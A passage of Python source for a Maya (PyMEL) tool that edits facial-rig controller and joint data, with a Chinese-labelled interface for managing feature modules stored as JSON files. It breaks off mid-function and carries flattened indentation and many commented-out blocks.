cw2=[60, 50],
adj=2,
cc=lambda *args: self.selected_controller())
if len(self.json_files) > 0:
for json_file in self.json_files:
pm.menuItem(label=json_file)
pm.optionMenuGrp("controllerOptionsWidget", e=True, sl=1)
def setting_json_folder(self):
json_folder = pm.fileDialog2(
dialogStyle=2,
fileFilter="JSON File (*.json);;",
fileMode=3, okc=u"选择文件夹")
if json_folder:
self.json_folder = json_folder[0]
self.json_files = self.scanning_folder()
self.option_menu_widget()
self.selected_controller()
return
def scanning_folder(self):
json_list = []
if self.json_folder != '':
path_dir = os.listdir(self.json_folder)
for json_file in path_dir:
# 获取JSON文件的名字后,清理文件的后缀名
file_name = os.path.splitext(json_file)[0]
json_list.append(file_name)
return json_list
def selected_controller(self):
if pm.columnLayout("controllerItemLayout", q=True, ex=True):
pm.deleteUI("controllerItemLayout")
pm.columnLayout(
"controllerItemLayout", adj=1, rs=10,
parent="controllerOptionsLayout")
index = pm.optionMenuGrp("controllerOptionsWidget", q=True, sl=True)
json_file_name = self.json_files[index - 1]
json_file_path = "%s/%s.json" % (self.json_folder, json_file_name)
if os.path.isfile(json_file_path):
dict_data = common.read_json(file_path=json_file_path)
for key in dict_data.keys():
slider = pm.floatSliderGrp(
label=key,
field=True,
pre=3,
cw3=[40, 60, 100],
minValue=-1.0,
maxValue=1.0)
pm.connectControl(slider, "%s.%s" % (json_file_name, key))
min_value = pm.PyNode(json_file_name).attr(key).getMin()
max_value = pm.PyNode(json_file_name).attr(key).getMax()
pm.floatSliderGrp(
slider, e=True, minValue=min_value, maxValue=max_value)
slider_joints = dict_data[key].keys()
pm.textScrollList(a=slider_joints)
pm.setParent("..")
return
def _closed_window_cmd(self):
pm.optionVar(
sv=('arFaceControllerJsonFolder', self.json_folder))
manager_version = 0.2
class FaceController:
def __init__(self):
self.controller_name = ""
def from_dict(self, dict_data):
self.controller_name = dict_data["ControllerName"]
self.controller_bone_name = dict_data["ControllerBoneName"]
self.controller_group_name = dict_data["ControllerGroupName"]
self.controller_postion_offset = dict_data["ControllerPositionOffset"]
self.controller_axis_control = dict_data["AxisControl"]
def __str__(self):
return self.controller_name
class FeatureManager():
def __init__(self, name):
self.name = name
self.control_group_file = ""
self.control_file = ""
def json_location(self, root_path):
self.control_group_file = os.path.join(root_path, "{}ControlGroup.json".format(self.name))
self.control_file = os.path.join(root_path, "{}Controller.json".format(self.name))
def __str__(self):
return self.name
def custom_widget(self, parent):
u"""
标签栏之自定义捏脸栏
:return: layout
"""
layout = pm.formLayout("{}FormTabLayout".format(self.name), p=parent)
controller_list_frame = pm.frameLayout("{}ControllerListFrameLayout".format(self.name),
bgs=True, mh=10, mw=10, p=layout,
label=("{} Controllers".format(self.name).title()))
pm.textScrollList("{}ControllerListWidget".format(self.name), w=120, h=130,
sc=lambda *args: self.select_controller())
pm.popupMenu()
pm.menuItem(label=u"创建测试代理体", c=lambda *args: self.build_test_proxy())
pm.button("{}ControllerBuildBtn".format(self.name), label="New", w=100,
c=lambda *args: self.command_new_control())
pm.setParent(controller_list_frame)
controller_meta_frame = pm.frameLayout("{}ControllerMetaFrameLayout".format(self.name),
bgs=True, mh=10, mw=10, p=layout,
label=("{} meta".format(self.name).title()))
pm.radioButtonGrp("{}ControllerSideField".format(self.name),
label=u'控制器位置',
numberOfRadioButtons=2,
labelArray2=['Middle', 'LF And RT'], cw3=[140, 80, 80])
pm.textFieldGrp("{}ControllerNameField".format(
self.name), label=u"控制器")
pm.textFieldGrp("{}ControllerBoneNameField".format(self.name), label=u"控制器挂点骨骼")
# pm.textFieldGrp("{}ControllerGroupNameField".format(self.name), label=u"控制器组")
pm.floatFieldGrp("{}ControllerPositionOffsetField".format(self.name),
label=u'控制器位置偏移', numberOfFields=3,
value1=0.0, value2=0.0, value3=0.0, cw4=[140, 50, 50, 50])
pm.checkBoxGrp("{}ControllerAxisControlField".format(self.name),
label=u'控制器滑竿',
numberOfCheckBoxes=3, labelArray3=['XAxis', 'YAxis', 'ZAxis'],
cw4=[140, 80, 80, 80])
pm.button("{}ControllerMetaUpdateBtn".format(self.name),
label=u"更新", c=lambda *args: self.update_meta_data())
pm.setParent(controller_meta_frame)
joint_list_frame = pm.frameLayout("{}ControlJointListFrameLayout".format(self.name),
bgs=True, mh=10, mw=10, p=layout,
label=("{} control joints".format(self.name).title()))
pm.tabLayout("{}ControlJointListTabLayout".format(self.name), p=joint_list_frame)
pm.setParent("..")
pm.setParent(joint_list_frame)
pm.formLayout(
layout, edit=True,
attachForm=[
(controller_list_frame, 'top', 10),
(controller_list_frame, 'left', 10),
(controller_meta_frame, 'top', 10),
(controller_meta_frame, 'right', 10),
(joint_list_frame, 'left', 10),
(joint_list_frame, 'right', 10),
(joint_list_frame, 'bottom', 10),
],
attachControl=[
(controller_meta_frame, 'left', 5, controller_list_frame),
(joint_list_frame, 'top', 5, controller_meta_frame),
])
pm.setParent("..")
self.init_data()
return layout
def axis_control_joints_widget(self, parent="", axis=""):
layout = pm.formLayout("{}Control{}JointFormLayout".format(self.name, axis), p=parent)
joint_list_frame = pm.frameLayout(
"{}Control{}JointListFrameLayout".format(self.name, axis), label="Joint List", p=layout)
# print("{}Control{}JointListWidget".format(self.name, axis))
pm.textScrollList("{}Control{}JointListWidget".format(self.name, axis), w=120)
pm.popupMenu()
pm.menuItem(label=u"添加骨骼", c=lambda *args: self.add_axis_joints())
pm.setParent(joint_list_frame)
joint_meta_frame = pm.frameLayout(
"{}Control{}JointMetaFrameWidget".format(self.name, axis), label="Joint Meta", p=layout)
pm.button(label=u"Update Max", c=lambda *args: self.update_joints_meta(value="Max"))
pm.button(label=u"Update Min", c=lambda *args: self.update_joints_meta(value="Min"))
pm.setParent("..")
pm.formLayout(layout, edit=True,
attachForm=[
(joint_list_frame, 'top', 10),
(joint_list_frame, 'left', 10),
(joint_list_frame, 'bottom', 10),
(joint_meta_frame, 'top', 10),
(joint_meta_frame, 'right', 10),
(joint_meta_frame, 'bottom', 10),
],
attachControl=[
(joint_meta_frame, 'left', 5, joint_list_frame),
])
pm.setParent(layout)
return layout
def add_axis_joints(self, value="default"):
tabs = pm.tabLayout("{}ControlJointListTabLayout".format(
self.name), q=True, tl=True)
select_tab_index = pm.tabLayout(
"{}ControlJointListTabLayout".format(self.name), q=True, sti=True)
current_tab = (tabs[select_tab_index - 1])
current_controller = pm.textScrollList(
"{}ControllerListWidget".format(self.name), q=True, si=True)[0]
select_joint = pm.ls(sl=True)
for index in range(0, len(self.control_group_data[current_controller]["ControlGroup"])):
if current_tab in self.control_group_data[current_controller]["ControlGroup"][index]["GroupName"]:
bone_range = self.control_group_data[current_controller]["ControlGroup"][index]["BoneRange"]
for joint in select_joint:
if joint not in pm.textScrollList(
"{}Control{}JointListWidget".format(self.name, current_tab), q=True, ai=True):
pm.textScrollList("{}Control{}JointListWidget".format(
self.name, current_tab), e=True, a=joint)
joint_data = {}
joint_data["BoneName"] = joint.name()
joint_data["Max"] = [0, 0, 0, 0, 0, 0, 1, 1, 1]
joint_data["Min"] = [0, 0, 0, 0, 0, 0, 1, 1, 1]
bone_range.append(joint_data)
self.control_group_data[current_controller]["ControlGroup"][index]["BoneRange"] = bone_range
common.write_json(self.control_group_data, self.control_group_file)
return
def update_joints_meta(self, value):
tabs = pm.tabLayout("{}ControlJointListTabLayout".format(
self.name), q=True, tl=True)
select_tab_index = pm.tabLayout(
"{}ControlJointListTabLayout".format(self.name), q=True, sti=True)
current_tab = (tabs[select_tab_index - 1])
# joint_list = pm.textScrollList("{}Control{}JointListWidget".format(
# self.name, current_tab), q=True, ai=True)
current_controller = pm.textScrollList(
"{}ControllerListWidget".format(self.name), q=True, si=True)[0]
control_group = self.control_group_data[current_controller]["ControlGroup"]
for index in range(0, len(control_group)):
# 查找ControlGroup里面对应的字典
if current_tab in control_group[index]["GroupName"]:
current_axis_data = control_group[index]["BoneRange"]
for axis_data in current_axis_data:
# print("axis_data:{}".format(axis_data))
bone_name = axis_data["BoneName"]
if value == "Max":
axis_data["Max"] = self.joint_cb_list(pm.PyNode(bone_name).getParent())
elif value == "Min":
axis_data["Min"] = self.joint_cb_list(pm.PyNode(bone_name).getParent())
# context_control_group = control_group[index]
# context_bone_range = context_control_group["BoneRange"]
# for bone_item in context_bone_range:
# for joint in joint_list:
# if joint in bone_item["BoneName"]:
# if value == "Max":
# bone_item["Max"] = self.joint_cb_list(
# pm.PyNode(joint).getParent())
# elif value == "Min":
# bone_item["Min"] = self.joint_cb_list(
# pm.PyNode(joint).getParent())
# else:
# joint_data = {}
# joint_data["BoneName"] = joint
# joint_data["Max"] = [0,0,0,0,0,0,1,1,1]
# joint_data["Min"] = [0,0,0,0,0,0,1,1,1]
# context_bone_range.append(joint_data)
# print(context_bone_range)
# for control_dict in context_control_group[BoneRange]:
# joint_dict = context_dict["BoneRange"]
# print(control_dict)
# bone_range = []
# # current_meta[index]["BoneRange"] = []
# # print(current_meta)
# for joint in joint_list:
# joint_data = {}
# joint_data["BoneName"] = joint
# if value == "Default":
# joint_data["Max"] = [0,0,0,0,0,0,1,1,1]
# joint_data["Min"] = [0,0,0,0,0,0,1,1,1]
# if value == "Max":
# joint_data["Max"] = self.joint_cb_list(pm.PyNode(joint).getParent())
# if "Min" in joint_data.keys():
# joint_data["Min"] = context_bone_range[index]
# else:
# joint_data["Min"] = [0,0,0,0,0,0,1,1,1]
# elif value =="Min":
# joint_data["Min"] = self.joint_cb_list(pm.PyNode(joint).getParent())
# if "Max" in joint_data.keys():
# joint_data["Max"] = joint_data["Max"]
# else:
# joint_data["Min"] = [0,0,0,0,0,0,1,1,1]
# current_meta[index]["BoneRange"].append(joint_data)
# bone_range.append(joint_data)
# print(bone_range)
# context_dict["BoneRange"] = bone_range
common.write_json(self.control_group_data, self.control_group_file)
return
def joint_cb_list(self, jnt, pre=5):
"""
骨骼在通道里面的值
列取骨骼在通道栏里面的属性及当前的值,数值小数点后保留5位,
其中位移属性的值需要缩小100倍,也就是乘以0.01,
这是为了解决FBX文件在MAYA,U3D这两个软件内比例单位的差异化造成的错误
:param jnt: 目标骨骼的名称
:param pre: 小数点后面保留几位
:return
"""
jnt_value = [
round(pm.PyNode(jnt).translateX.get() * 0.01, pre),
round(pm.PyNode(jnt).translateY.get() * 0.01, pre),
round(pm.PyNode(jnt).translateZ.get() * 0.01, pre),
round(pm.PyNode(jnt).rotateX.get(), pre),
round(pm.PyNode(jnt).rotateY.get(), pre),
round(pm.PyNode(jnt).rotateZ.get(), pre),
# 1, 1, 1
round(pm.PyNode(jnt).scaleX.get(), pre),
round(pm.PyNode(jnt).scaleY.get(), pre),
round(pm.PyNode(jnt).scaleZ.get(), pre),
]
return jnt_value
def init_data(self):
pm.textScrollList("{}ControllerListWidget".format(self.name), e=True, ra=True)
self.control_group_data = common.read_json(self.control_group_file)
self.control_data = common.read_json(self.control_file)
self.controller_list = self.control_data["{}Controller".format(self.name)]
if len(self.controller_list) > 0:
for controller in self.controller_list:
control = FaceController()
control.from_dict(controller)
pm.textScrollList("{}ControllerListWidget".format(self.name), e=True,
a=control.controller_name)
pm.textScrollList("{}ControllerListWidget".format(self.name), e=True, sii=1)
select_controller_index = self.select_controller()
self.init_control_joints_frmae_data(select_controller_index)
return
def init_control_joints_frmae_data(self, select_controller_index):
axis_joint_tabs = self.controller_list[select_controller_index]["AxisControl"].values()
for tab in axis_joint_tabs:
if not tab == "":
# print(tab)
layout = "{}Control{}JointFormLayout".format(self.name, tab)
if pm.formLayout(layout, q=True, ex=True):
pm.deleteUI(layout)
# if tab
axis_joint_tab = self.axis_control_joints_widget(
parent="{}ControlJointListTabLayout".format(self.name), axis=tab)
pm.tabLayout("{}ControlJointListTabLayout".format(self.name), edit=True,
tabLabel=((axis_joint_tab, tab)))
controller_name = pm.textFieldGrp(
"{}ControllerNameField".format(self.name), q=True, text=True)
all_bone_range = self.control_group_data[controller_name]["ControlGroup"]
for bone_range in all_bone_range:
if tab in bone_range["GroupName"]:
for bone_dict in bone_range["BoneRange"]:
bone_name = bone_dict["BoneName"]
text_scroll_list = "{}Control{}JointListWidget".format(self.name, tab)
if bone_name not in pm.textScrollList(text_scroll_list, q=True, ai=True):
pm.textScrollList(text_scroll_list, e=True, a=bone_name)
def command_new_control(self):
if self.build_control():
self.init_data()
return
def build_control(self):
u"""创建新的控制器
:return:
"""
default_control_data = {
"ControllerPositionOffset": [0.0, 0.0, 0.0],
"ControllerGroupName": "{}ControlGroup".format(self.name),
"ControllerBoneName": "",
"AxisControl": {
"ZAxis": "",
"XAxis": "",
"YAxis": ""
},
"ControllerName": "control"
}
self.control_data['{}Controller'.format(
self.name)].append(default_control_data)
common.write_json(self.control_data, self.control_file)
default_control_joint_group = []
default_control_joint_group.append({
"BoneRange": [],
"GroupName": "control_X"
})
default_control_joint_group.append({
"BoneRange": [],
"GroupName": "control_Y"
})
default_control_joint_group.append({
"BoneRange": [],
"GroupName": "control_Z"
})
default_control_group_data = {
"ControlGroup": default_control_joint_group,
"GroupName": "{}ControlGroup".format(self.name),
"shapeType": "control"
}
self.control_group_data["control"] = default_control_group_data
common.write_json(self.control_group_data, self.control_group_file)
return True
def select_controller(self):
select_index = pm.textScrollList(
"{}ControllerListWidget".format(self.name), q=True, sii=True)[0]
controller_data = self.get_controller_meta_data(select_index - 1)
self.clean_meta_data_frame()
self.retrieve_meta_data(controller_data)
# pm.textScrollList("{}ControllerListWidget".format(self.name), e=True, ra=True)
select_controller = pm.textScrollList(
"{}ControllerListWidget".format(self.name), q=True, si=True)[0]
# for tab_layout in pm.tabLayout("{}ControlJointListTabLayout".format(self.name), q=True, tl=True):
# pm.deleteUI(tab_layout)
# print(tab_layout)
print(pm.tabLayout("{}ControlJointListTabLayout".format(self.name), q=True, tl=True))
self.init_control_joints_frmae_data(select_index - 1)
# select_controller_index = select_index - 1
# axis_joint_tabs = self.controller_list[select_controller_index]["AxisControl"].values()
# for tab in axis_joint_tabs:
# if not tab == "":
# # print(tab)
# layout = "{}Control{}JointFormLayout".format(self.name, tab)
# # if pm.formLayout(layout, q=True, ex=True):
# # pm.deleteUI(layout)
# self.init_data()
return select_index - 1
def get_controller_meta_data(self, controller_index):
return self.controller_list[controller_index]
def clean_meta_data_frame(self):
pm.textFieldGrp("{}ControllerNameField".format(
self.name), e=True, text="")
pm.textFieldGrp("{}ControllerBoneNameField".format(
self.name), e=True, text="")
# pm.textFieldGrp("{}ControllerGroupNameField".format(self.name), e=True, text="")
pm.floatFieldGrp("{}ControllerPositionOffsetField".format(self.name), e=True,
value1=0.0, value2=0.0, value3=0.0)
pm.checkBoxGrp("{}ControllerAxisControlField".format(self.name), e=True,
value1=False, value2=False, value3=False)
return
def retrieve_meta_data(self, data):
u"""查询控制器元数据
:return
"""
if "_LF" in data["ControllerName"] or "RT" in data["ControllerName"]:
pm.radioButtonGrp("{}ControllerSideField".format(
self.name), e=True, sl=2)
else:
pm.radioButtonGrp("{}ControllerSideField".format(
self.name), e=True, sl=1)
pm.textFieldGrp("{}ControllerNameField".format(
self.name), e=True, text=data["ControllerName"])
pm.textFieldGrp("{}ControllerBoneNameField".format(
self.name), e=True, text=data["ControllerBoneName"])
# pm.textFieldGrp("{}ControllerGroupNameField".format(self.name), e=True, text=data["ControllerGroupName"])
pm.floatFieldGrp("{}ControllerPositionOffsetField".format(self.name), e=True,
value1=data["ControllerPositionOffset"][0],
value2=data["ControllerPositionOffset"][1],
value3=data["ControllerPositionOffset"][2])
axis_control_check_grp = data["AxisControl"]
if axis_control_check_grp["XAxis"] == "":
axis_x = False
else:
axis_x = True
if axis_control_check_grp["YAxis"] == "":
axis_y = False
else:
axis_y = True
if axis_control_check_grp["ZAxis"] == "":
axis_z = False
else:
axis_z = True
pm.checkBoxGrp("{}ControllerAxisControlField".format(self.name), e=True,
value1=axis_x, value2=axis_y, value3=axis_z)
return
def update_meta_data(self):
U""" 更新元数据
:return: True
"""
meta_data = {}
controller_name = pm.textFieldGrp(
"{}ControllerNameField".format(self.name), q=True, text=True)
meta_data["ControllerName"] = controller_name
meta_data["ControllerBoneName"] = pm.textFieldGrp(
"{}ControllerBoneNameField".format(self.name), q=True, text=True)
meta_data["ControllerGroupName"] = "{}ControlGroup".format(self.name)
meta_data["ControllerPositionOffset"] = pm.floatFieldGrp(
"{}ControllerPositionOffsetField".format(self.name), q=True, value=True)
meta_data["AxisControl"] = {}
if pm.checkBoxGrp("{}ControllerAxisControlField".format(self.name), q=True, v1=True):
meta_data["AxisControl"]["XAxis"] = "{}_X".format(controller_name)
else:
meta_data["AxisControl"]["XAxis"] = ""
if pm.checkBoxGrp("{}ControllerAxisControlField".format(self.name), q=True, v2=True):
meta_data["AxisControl"]["YAxis"] = "{}_Y".format(controller_name)
else:
meta_data["AxisControl"]["YAxis"] = ""
if pm.checkBoxGrp("{}ControllerAxisControlField".format(self.name), q=True, v3=True):
meta_data["AxisControl"]["ZAxis"] = "{}_Z".format(controller_name)
else:
meta_data["AxisControl"]["ZAxis"] = ""
select_index = pm.textScrollList(
"{}ControllerListWidget".format(self.name), q=True, sii=True)[0]
select_control = pm.textScrollList(
"{}ControllerListWidget".format(self.name), q=True, si=True)[0]
self.controller_list[select_index - 1] = meta_data
# print(select_control)
# print(self.control_group_data)
control_data = self.control_group_data[select_control]
control_data["shapeType"] = controller_name
control_data["GroupName"] = "{}ControlGroup".format(self.name)
current_controller = pm.textScrollList(
"{}ControllerListWidget".format(self.name), q=True, si=True)[0]
for control_group in control_data["ControlGroup"]:
control_group["GroupName"] = control_group["GroupName"].replace(
current_controller, controller_name)
del self.control_group_data[select_control]
self.control_group_data[controller_name] = control_data
# print(self.control_group_data)
if (common.write_json(self.control_data, self.control_file) and
common.write_json(self.control_group_data, self.control_group_file)):
self.clean_meta_data_frame()
all_tabs = pm.tabLayout(
"{}ControlJointListTabLayout".format(self.name), q=True, ca=True)
if all_tabs is not None:
if len(all_tabs) > 1:
for tab in all_tabs:
pm.deleteUI(tab)
self.init_data()
return True
def build_test_proxy(self):
# selected_tab = self.current_select_tab("jsonManagerMainTabLayout")
selected_tab = self.name
selected_controller = pm.textScrollList("{}ControllerListWidget".format(self.name), q=True, si=True)[0]
print(self.name)
print(selected_controller)
def current_select_tab(self, tab_object):
tabs = pm.tabLayout(tab_object, q=True, tl=True)
select_tab_index = pm.tabLayout(tab_object, q=True, sti=True)
current_tab = (tabs[select_tab_index - 1])
return current_tab
class JsonManager(common.Singleton):
"""
Json数据文件管理工具
"""
def __init__(self):
super(JsonManager, self).__init__()
self.json_folder = ''
self.module_sections = []
self.dict_data = list()
self.detail_data = dict()
self.controller = {}
self.controller_detail = {}
self.current_tab_index = 1
# 历史版本的json文件存放路径
self.brow_file_folder = ""
self.eye_file_folder = ""
self.nose_file_folder = ""
self.mouth_file_folder = ""
self.face_file_folder = ""
self.show()
self.initialize()
# self.selected_controller()
def show(self):
u"""显示工具窗口
:return: window
"""
if pm.window("jsonManagerUI", ex=True):
pm.deleteUI("jsonManagerUI")
pm.window("jsonManagerUI", t=u"角色脸部特征编辑器 %s" % manager_version, mb=True,
cc=lambda *args: self._closed_window_cmd())
# self.menu_list()
form_layout = pm.formLayout()
config_frame = pm.frameLayout(
p=form_layout, label=u"配置面板", mw=5, mh=5, bgs=True, cll=True, cl=False)
pm.textFieldButtonGrp("XDFaceEditDataStoreField", label=u"存储路径", bl=u"设置", adj=2, cw3=[60, 100, 40],
bc=lambda *args: self.setting_json_folder())
pm.textFieldButtonGrp("XDFaceEditNewModuleField", label=u"特征模块", bl=u"新建", adj=2, cw3=[60, 100, 40],
bc=lambda *args: self.command_new_module())
pm.setParent(config_frame)
work_frame = pm.frameLayout(
p=form_layout, label=u"工作面板", mw=5, mh=5, bgs=True, cll=True, cl=False)
self.main_tab = pm.tabLayout(
"jsonManagerMainTabLayout", innerMarginWidth=5, innerMarginHeight=5)
pm.setParent(self.main_tab)
pm.setParent(work_frame)
pm.formLayout(
form_layout, edit=True,
attachForm=[
(config_frame, 'top', 10),
(config_frame, 'left', 10),
(config_frame, 'right', 10),
(work_frame, 'left', 10),
(work_frame, 'right', 10),
(work_frame, 'bottom', 10),
],
attachControl=[
(work_frame, 'top', 5, config_frame),
])
pm.setParent(form_layout)
pm.showWindow("jsonManagerUI")
def menu_list(self):
u"""
工具菜单栏
:return:
"""
pm.menu(label=u"设置", tearOff=True)
pm.menuItem(
label=u"设置Json存放目录",
c=lambda *args: self.setting_json_folder())
pm.menuItem(
label=u"调试模式", cb=False)
return
def custom_tab(self):
"""
标签栏之自定义捏脸栏
:return: layout
"""
layout = pm.formLayout("customFormTab")
option_menu = self.option_menu_widget(parent_widget=layout)
add_module_btn = pm.button(
label=u"增加模块",
c=lambda *args: self.add_module())
tab_layout = pm.tabLayout(
innerMarginWidth=5, innerMarginHeight=5)
controller_list_layout = pm.formLayout()
add_controller_btn = pm.button(
label=u"增加控制器",
c=lambda *args: self.add_controller())
add_controller_detail_btn = pm.button(
label=u"增加控制器细节",
c=lambda *args: self.add_control_detail_widget())
pm.scrollLayout(
"controllerListLayout", height=400)
pm.setParent("..")
save_data_btn = pm.button(
"saveDataBtn",
label=u"保存数据",
c=lambda *args: self.save_custom_data())
pm.formLayout(
controller_list_layout, edit=True,
attachForm=[
(add_controller_btn, 'top', 10),
(add_controller_btn, 'left', 10),
(add_controller_detail_btn, 'top', 10),
("controllerListLayout", 'left', 10),
("controllerListLayout", 'right', 10),
(save_data_btn, 'left', 10),
(save_data_btn, 'right', 10),
(save_data_btn, 'bottom', 10)
],
attachControl=[
(add_controller_detail_btn, 'left', 5, add_controller_btn),
("controllerListLayout", 'top', 10, add_controller_btn),
("controllerListLayout", 'bottom', 10, save_data_btn),
])
pm.setParent("..")
controller_detail_list_layout = pm.scrollLayout(
"controllerDetailListLayout", height=400)
pm.setParent("..")
controller_test_list_layout = pm.formLayout()
create_test_controller_btn = pm.button(
label=u"创建测试控制器",
c=lambda *args: self.create_editor_test_controller())
test_scroll = pm.scrollLayout(
"controllerTestListLayout", height=400)
pm.setParent("..")
pm.formLayout(
controller_test_list_layout, edit=True,
attachForm=[
(create_test_controller_btn, 'top', 10),
(create_test_controller_btn, 'left', 10),
(create_test_controller_btn, 'right', 10),
(test_scroll, "left", 10),
(test_scroll, "right", 10),
],
attachControl=[
(test_scroll, 'top', 5, create_test_controller_btn),
])
pm.setParent("..")
pm.tabLayout(
tab_layout,
edit=True,
tabLabel=(
(controller_list_layout, u'控制器'),
(controller_detail_list_layout, u'影响骨骼'),
(controller_test_list_layout, u'测试')
))
pm.setParent("..")
pm.formLayout(
layout, edit=True,
attachForm=[
(option_menu, 'top', 10),
(option_menu, 'left', 10),
(add_module_btn, 'right', 10),
(add_module_btn, 'top', 7),
(tab_layout, 'left', 10),
(tab_layout, 'right', 10),
(tab_layout, 'bottom', 10),
],
attachControl=[
(option_menu, 'right', 5, add_module_btn),
(tab_layout, 'top', 5, option_menu),
])
pm.setParent("..")
return layout
def create_editor_test_controller(self):
selected_module = pm.optionMenuGrp(
"faceModuleOptionsWidget", q=True, value=True)
controller_file = "%s/%s/%sController.json" % (
self.json_folder, selected_module, selected_module)
control_group_file = "%s/%s/%sControlGroup.json" % (
self.json_folder, selected_module, selected_module)
dict_data = common.read_json(file_path=controller_file)
detail_data = common.read_json(file_path=control_group_file)
for controller in dict_data["%sController" % selected_module]:
self.editor_test_controller(
controller,
detail_data[controller["controllerName"]])
return
def editor_test_controller(self, controller={}, detail_data={}):
test_controller = test_node.TestEditorController()
test_controller.get_controller_from_data(controller, detail_data)
test_controller.create_locator_controller()
return test_controller
def add_slider_for_selected(self):
# print(pm.textScrollList("ARIDScrollList", q=True, si=True)[0])
selected_key = pm.textScrollList("ARIDScrollList", q=True, si=True)[0]
# print(self.ar_data[selected_key])
if not pm.objExists(selected_key):
self.create_slider_controller(name=selected_key)
return
def create_slider_controller(self, name):
locator = zero_locator(name=name)
pm.addAttr(locator, ln="sliderX", at="double", min=0, max=1, dv=0)
pm.setAttr("%s.sliderX" % locator, e=True, k=True)
return
def initialize(self):
if pm.optionVar(q='jsonManagerFolder'):
self.json_folder = pm.optionVar(q='jsonManagerFolder')
pm.textFieldButtonGrp("XDFaceEditDataStoreField", e=True, text=self.json_folder)
self.init_module_data()
# if pm.optionVar(q='jsonManagerMainTabLayoutIndex'):
# self.current_tab_index = int(pm.optionVar(
# q='jsonManagerMainTabLayoutIndex'))
# if pm.optionVar(q='jsonManagerDiscardBrowFilePath'):
# self.brow_file_folder = pm.optionVar(
# q='jsonManagerDiscardBrowFilePath')
# if pm.optionVar(q='jsonManagerDiscardEyeFilePath'):
# self.eye_file_folder = pm.optionVar(
# q='jsonManagerDiscardEyeFilePath')
# if pm.optionVar(q='jsonManagerDiscardNoseFilePath'):
# self.nose_file_folder = pm.optionVar(
# q='jsonManagerDiscardNoseFilePath')
# if pm.optionVar(q='jsonManagerDiscardMouthFilePath'):
# self.mouth_file_folder = pm.optionVar(
# q='jsonManagerDiscardMouthFilePath')
# if pm.optionVar(q='jsonManagerDiscardFaceFilePath'):
# self.face_file_folder = pm.optionVar(
# q='jsonManagerDiscardFaceFilePath')
def init_module_data(self):
self.module_sections = self.scanning_folder("folders")
for module_section in self.module_sections:
module = FeatureManager(module_section)
module.json_location(os.path.join(self.json_folder, module_section))
layout = module.custom_widget(parent=self.main_tab)
pm.tabLayout(self.main_tab, edit=True, tabLabel=((layout, module_section)))
# for rig_classic_components
def _closed_window_cmd(self):
pm.optionVar(sv=('jsonManagerFolder', self.json_folder))
# pm.optionVar(sv=('arFileLocation', self.ar_file_location))
# self.current_tab_index = pm.tabLayout(self.main_tab, q=True, sti=True)
# pm.optionVar(
# sv=('jsonManagerMainTabLayoutIndex', self.current_tab_index))
# pm.optionVar(
# sv=('jsonManagerDiscardBrowFilePath', self.brow_file_folder))
# pm.optionVar(
# sv=('jsonManagerDiscardEyeFilePath', self.eye_file_folder))
# pm.optionVar(
# sv=('jsonManagerDiscardNoseFilePath', self.nose_file_folder))
# pm.optionVar(
# sv=('jsonManagerDiscardMouthFilePath', self.mouth_file_folder))
# pm.optionVar(
# sv=('jsonManagerDiscardFaceFilePath', self.face_file_folder))
def setting_json_folder(self):
json_folder = pm.fileDialog2(
dialogStyle=2, fileFilter="JSON File (*.json);;", fileMode=3, okc=u"选择文件夹")
if json_folder[0]:
self.json_folder = json_folder[0]
self.module_sections = self.scanning_folder("folders")
pm.textFieldButtonGrp("XDFaceEditDataStoreField",
e=True, text=json_folder[0])
return
def scanning_folder(self, return_type):
u"""扫描文件夹,将目录列取出来,如果目录下有对应的文件(例:文件夹名face, 对应的文件)
:param return_type: 返回类型
"""
json_list = []
json_file = ""
folder_list = []
if self.json_folder != '':
path_dir = os.listdir(self.json_folder)
for json_file in path_dir:
if json_file == ".mayaSwatches":
continue
full_path = "%s/%s" % (self.json_folder, json_file)
if os.path.isdir(full_path):
# print("%s it's a directory" % full_path)
folder_list.append(json_file)
elif os.path.isfile(full_path):
# print("%s it's a normal file" % full_path)
# 获取JSON文件的名字后,清理文件的后缀名
file_name = os.path.splitext(json_file)[0]
json_list.append(file_name)
if return_type == "files":
return json_file
elif return_type == "folders":
return folder_list
def command_new_module(self):
if self.new_module():
self.init_module_data()
def new_module(self):
u"""创建新的特征模块
:return:
"""
data_root = self.json_folder
module_name = pm.textFieldButtonGrp(
"XDFaceEditNewModuleField", q=True, text=True)
if not module_name == "":
module_path = os.path.join(data_root, module_name)
# print(module_path)
if not os.path.exists(module_path):
os.makedirs(module_path)
if self.new_module_data_file(module_name, module_path):
pm.textFieldButtonGrp(
"XDFaceEditNewModuleField", e=True, text="")
else:
pm.error(u"{}模块创建过程错误,目录下已经存在同名模块".format(module_name))
else:
pm.error(u"模块的名字不能缺")
return True
def new_module_data_file(self, module_name, module_path):
module_control_group_file = "{}ControlGroup.json".format(module_name)
module_control_group_file_path = os.path.join(
module_path, module_control_group_file)
module_control_group_data = {}
print(module_control_group_file_path)
common.write_json(module_control_group_data,
file_path=module_control_group_file_path)
module_control_file = "{}Controller.json".format(module_name)
module_control_file_path = os.path.join(
module_path, module_control_file)
module_control_data = {}
module_control_data["{}Controller".format(module_name)] = []
print(module_control_file_path)
common.write_json(module_control_data,
file_path=module_control_file_path)
return True
def option_menu_widget(self, parent_widget):
if pm.optionMenuGrp("faceModuleOptionsWidget", ex=True):
pm.deleteUI("faceModuleOptionsWidget")
widget = pm.optionMenuGrp(
"faceModuleOptionsWidget",
parent=parent_widget,
label=u"模块名称",
cw2=[50, 50],
adj=2,
cc=lambda *args: self.selected_controller(pm.optionMenuGrp(widget, q=True, value=True)))
if len(self.module_sections) > 0:
for json_file in self.module_sections:
pm.menuItem(label=json_file)
return widget
def selected_controller(self, module):
u"""
选择控制器
"""
selected_controller = pm.optionMenuGrp(
"faceModuleOptionsWidget", q=True, value=True)
# print("selected controller: %s" % selected_controller)
controller_file = "%s/%s/%sController.json" % (
self.json_folder, module, module)
# print(controller_file)
controller_list = pm.scrollLayout(
"controllerListLayout", q=True, ca=True)
detail_list = pm.scrollLayout(
"controllerDetailListLayout", q=True, ca=True)
if controller_list is not None:
# print controller_list
for child in controller_list:
pm.deleteUI(child)
if detail_list is not None:
for child in detail_list:
pm.deleteUI(child)
dict_data = None
with open(controller_file, 'r') as data:
dict_data = json.load(data)
# print(dict_data)
controller_key = "%sController" % module
for index in range(0, len(dict_data[controller_key])):
self.add_controller_widget(
index=index, parent="controllerListLayout")
pm.textFieldButtonGrp(
"controllerNameWidget%s" % index, e=True,
text=dict_data[controller_key][index]["controllerName"])
pm.textFieldButtonGrp(
"controllerGrpNameWidget%s" % index, e=True,
text=dict_data[controller_key][index]["ControllerGroupName"])
pm.textFieldButtonGrp(
